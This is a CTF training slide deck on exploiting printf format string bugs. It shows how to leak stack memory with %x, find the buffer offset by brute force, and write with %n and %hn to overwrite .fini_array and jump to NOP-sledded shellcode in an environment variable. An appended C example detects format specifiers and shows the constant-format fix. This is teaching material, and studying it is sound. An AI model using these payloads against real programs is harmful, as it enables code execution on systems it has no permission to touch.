String format exploitation in 15"

Short course I gave about format string vulnerability exploitation. Mostly for wargames/CTF.

Source code can be found at:


Julien Bachmann

January 22, 2015


  1. Exploiting format string in 15'' | CTF training session, Julien Bachmann / @milkmix_
  2. intro | source? Coming from variadic functions (va_arg, printf). Missing format string: when the user can specify the format string.
  3. intro | consequence? Two possibilities: display process memory, modify process memory :)
  4. intro | man 3 printf
     printf("hex value: %x", 42);
     int i; printf("number of bytes so far%n", &i);
     printf("%2$s %1$s\n", "world", "Hello");
  5. read | detail printf(buf); printf("%x"); (stack diagram: buf, @ret, %ebp; values 0x42424242 0x41414141)
  6. read | detail printf(buf); printf("%2$x"); (same stack diagram: buf, @ret, %ebp; values 0x42424242 0x41414141)
  7. read | find our buffer: it is in the stack; need to find the virtual argument to printf; brute force it! Possibly need to add [1-3] padding bytes to align on 4 bytes.
  8. read | our target
  9. read | find our buffer
     for offset in `seq 0 20`; do echo "offset=$offset"; ./strfmt "AAAA%$offset\$x"; echo; done | grep 4141 -B1
  10. write | specific address: put it in our buffer; use %n to write instead of %x to read; check the system endianness.
  11. write | specific address
     ./strfmt `python -c 'print "B\x42\x42\x42\x42%6$n"'`
  12. write | specific address
  13. write | specific address: what to overwrite? An interesting variable, GOT, .dtor, .fini_array; checksec to validate writable zones.
  14. write | specific address
  15. write | specific address: how to write? Endianness again ;) Not possible to write 0xffffdee8 (shellcode address in environment) in one pass. Split in two: 0xdee8, then 0xffff - 0xdee8. Use %hn to write only a word and not rewrite the first part.
  16. write | specific address
     EGG=`python -c 'print "\x90"*100+"<shellcode>"'`
     ./strfmt `python -c 'print "B \x68\x96\x04\x08\x6a\x96\x04\x08%57055c%6$hn%8471c%7$hn"'`
     (annotations: @<.fini_array>, @<.fini_array> + 2, 0xdee8 - 9, 0xffff - 0xdee8)
  17. auto | libformatstr From hellman: brute force and automatic format generation :)
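As an added example that is not part of the slides (all names are this example's own): a scanner that recognises the printf conversion specifications the slides rely on (%x reads, %N$ direct parameter access, %n/%hn writes) in untrusted text, usable as a detection or input-validation check, next to the constant-format call that removes the bug.

```c
/* Added example, not from the slides: scan untrusted text for printf
 * conversion specs, and show the fixed-format call that removes the bug. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

struct fmt_report {
    int conversions;   /* real conversion specs found (%% is not counted) */
    int writes;        /* how many are %n / %hn / %hhn, i.e. memory writes */
    int positional;    /* how many use the direct "%N$" parameter form */
};

/* Walk the string as printf would: '%' opens a spec, "%%" is a literal.
 * Grammar covered: %[N$][flags][width][.precision][length]conversion */
struct fmt_report scan_format(const char *s)
{
    struct fmt_report r = {0, 0, 0};
    const char *p = s;
    while ((p = strchr(p, '%')) != NULL) {
        p++;
        if (*p == '%') { p++; continue; }                     /* literal % */
        const char *q = p;
        while (isdigit((unsigned char)*q)) q++;               /* N$ or width */
        if (q > p && *q == '$') { r.positional++; q++; }
        while (*q && strchr("-+ #0", *q)) q++;                /* flags */
        while (isdigit((unsigned char)*q) || *q == '*') q++;  /* width */
        if (*q == '.') { q++; while (isdigit((unsigned char)*q) || *q == '*') q++; }
        while (*q && strchr("hlLqjzt", *q)) q++;              /* length */
        if (*q == '\0') break;                                /* truncated spec */
        r.conversions++;
        if (*q == 'n') r.writes++;
        p = q + 1;
    }
    return r;
}

/* Defence in depth for a path that must hand user text to a printf-style API:
 * return -1 (and let the caller log it) when any conversion spec is present. */
int reject_if_format(const char *user)
{
    return scan_format(user).conversions > 0 ? -1 : 0;
}

/* The real fix for the slides' printf(buf): user data is only ever an argument
 * to a constant format, so a "%n" inside it is copied, never interpreted. */
void echo_safe(char *out, size_t n, const char *user)
{
    snprintf(out, n, "%s", user);
}
```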